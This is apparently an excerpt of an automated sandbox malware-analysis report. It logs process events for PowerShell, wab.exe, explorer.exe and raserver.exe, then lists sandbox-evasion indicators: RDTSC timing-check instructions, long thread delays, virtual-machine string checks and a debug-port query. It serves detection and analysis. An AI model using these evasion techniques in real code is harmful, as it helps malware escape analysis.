        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 667B970
        Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 7FFB2CED0774
        Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
        Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 7FFB2CECD8A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
        Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
        Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFB2CED0774
        Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
        Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
        Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
        Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
        Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
        Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFB2CECD8A4
        Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
        Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
        Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA04
        Source: C:\Windows\SysWOW64\raserver.exeAPI/Special instruction interceptor: Address: 7FFB2CECD744
        Source: C:\Program Files (x86)\Windows Mail\wab.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Program Files (x86)\Windows Mail\wab.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 1D9904 second address: 1D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 1D9B6E second address: 1D9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2249D1C0 rdtsc 20_2_2249D1C0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6330Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3535Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7156Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2575Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 750Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 634Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 586Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 1.7 %
        Source: C:\Windows\SysWOW64\raserver.exeAPI coverage: 2.0 %
        Source: C:\Windows\System32\wscript.exe TID: 6760Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep time: -2767011611056431s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep count: 7156 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep count: 2575 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -3689348814741908s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8148Thread sleep count: 750 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\raserver.exe TID: 4064Thread sleep time: -42000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: wscript.exe, 00000000.00000002.1370620329.0000020476C3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
        Source: wscript.exe, 00000000.00000003.1369707931.000002047516F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1370313493.000002047516F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244762105.000002047773E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244435885.000002047773E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1371689572.000002047773E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1367860094.000002047773E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: wscript.exe, 00000000.00000003.1367477793.000002047770E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
        Source: powershell.exe, 0000000C.00000002.2097671228.000001A8DDA95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW17
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2249D1C0 rdtsc 20_2_2249D1C0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_045AD6CC LdrInitializeThunk,16_2_045AD6CC
